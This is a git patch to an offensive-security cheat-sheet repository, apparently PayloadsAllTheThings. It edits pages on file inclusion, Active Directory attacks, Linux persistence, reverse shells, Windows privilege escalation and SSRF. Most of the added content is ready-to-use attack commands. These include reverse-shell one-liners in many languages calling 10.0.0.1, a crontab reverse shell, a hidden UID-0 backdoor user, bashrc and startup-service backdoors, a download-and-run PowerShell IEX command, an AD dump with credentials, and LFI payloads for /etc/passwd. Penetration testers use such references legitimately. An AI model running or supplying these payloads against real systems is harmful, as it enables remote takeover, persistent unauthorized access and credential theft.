From 9be62677b683bc06d80e34f13351d32e98469c8f Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 24 Jun 2019 00:21:39 +0200 Subject: [PATCH] Add root user + PHP null byte version --- File Inclusion/README.md | 3 ++ GraphQL Injection/README.md | 4 ++- .../Active Directory Attack.md | 10 +++++- .../Linux - Persistence.md | 31 +++++++++++++++-- .../Reverse Shell Cheatsheet.md | 33 ++++++++++++------- .../Windows - Privilege Escalation.md | 8 ++--- Server Side Request Forgery/README.md | 4 ++- 7 files changed, 72 insertions(+), 21 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 924241b..c9049a1 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -33,6 +33,7 @@ * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) +* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) ## Basic LFI @@ -44,6 +45,8 @@ http://example.com/index.php?page=../../../etc/passwd ### Null byte +:warning: In versions of PHP below 5.3 we can terminate with null byte. + ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index e015274..04464d4 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -211,4 +211,6 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/) * [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066) * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/) -* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) \ No newline at end of file +* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) +* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) +* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3eb8800..7c6bb5c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password. Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID ``` +or dump the Active Directory and `grep` the content. + +```powershell +ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ +``` ### PassTheTicket Golden Tickets @@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. +> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. + Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. ```powershell @@ -645,4 +652,5 @@ Most of the time the best passwords to spray are : * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) -* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) \ No newline at end of file +* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index f39abf5..45ec556 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -1,5 +1,21 @@ # Linux - Persistence +## Summary + +* [Basic reverse shell](#basic-reverse-shell) +* [Add a root user](#add-a-root-user) +* [Suid Binary](#suid-binary) +* [Crontab - Reverse shell](#crontab-reverse-shell) +* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc) +* [Backdooring a startup service](#backdoor-a-startup-service) +* [Backdooring a user startup file](#backdooring-an-user-startup-file) +* [Backdooring a driver](#backdooring-a-driver) +* [Backdooring the APT](#backdooring-the-apt) +* [Backdooring the SSH](#backdooring-the-ssh) +* [Tips](#tips) +* [References](#references) + + ## Basic reverse shell ```bash @@ -8,6 +24,13 @@ ncat --sctp -lvp 4242 ncat --tcp -lvp 4242 ``` +## Add a root user + +```powershell +sudo useradd -ou 0 -g 0 john +sudo passwd john +``` + ## Suid Binary ```powershell @@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant chmod 4777 $TMPDIR2/croissant ``` -## Crontab (Reverse shell to 192.168.1.2 on port 4242) +## Crontab - Reverse shell ```bash (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null ``` -## Backdooring an user's bash_rc (FR/EN Version) +## Backdooring a user's bash_rc + +(FR/EN Version) ```bash TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" @@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart ``` -## Backdooring an user startup file +## Backdooring a user startup file Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 368f68a..e08aff0 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -5,6 +5,7 @@ * [Reverse Shell](#reverse-shell) * [Bash TCP](#bash-tcp) * [Bash UDP](#bash-udp) + * [Socat](#socat) * [Perl](#perl) * [Python](#python) * [PHP](#php) @@ -50,6 +51,15 @@ Listener: nc -u -lvp 4242 ``` +### Socat + +```powershell +user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 +user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +``` + +Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) + ### Perl ```perl @@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp"," ```bash nc -e /bin/sh [IPADDR] [PORT] +nc.traditional -e /bin/bash 10.0.0.1 4444 ``` ### Netcat OpenBsd ```bash -rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f ``` ### Ncat @@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet ### Powershell ```powershell -powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ```powershell -powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ```powershell @@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse ### Awk ```powershell -awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` ### Java ```java r = Runtime.getRuntime() -p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ### War ```java -msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war strings reverse.war | grep jsp # in order to get the name of the file ``` @@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file Linux only ```powershell -lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` Windows and Linux ```powershell -lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ### NodeJS @@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); - client.connect(8080, "10.17.26.64", function(){ + client.connect(4242, "10.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); @@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") or -require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') +require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242') or -var x = global.process.mainModule.require --x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') +-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash') or diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 5c3cfde..83de0f5 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -23,6 +23,10 @@ ## Tools +- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) + ```powershell + powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks + ``` - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) ```powershell @@ -43,10 +47,6 @@ ```powershell powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt ``` -- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) - ```powershell - powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks - ``` ## Windows Version and Configuration diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b2726c1..70bb50c 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -114,6 +114,7 @@ http://0000::1:3128/ Squid ### Bypass localhost with a domain redirection ```powershell +http://spoofed.burpcollaborator.net http://localtest.me http://customer1.app.localhost.my.company.127.0.0.1.nip.io http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost @@ -628,4 +629,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) -- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) \ No newline at end of file +- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) +- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) \ No newline at end of file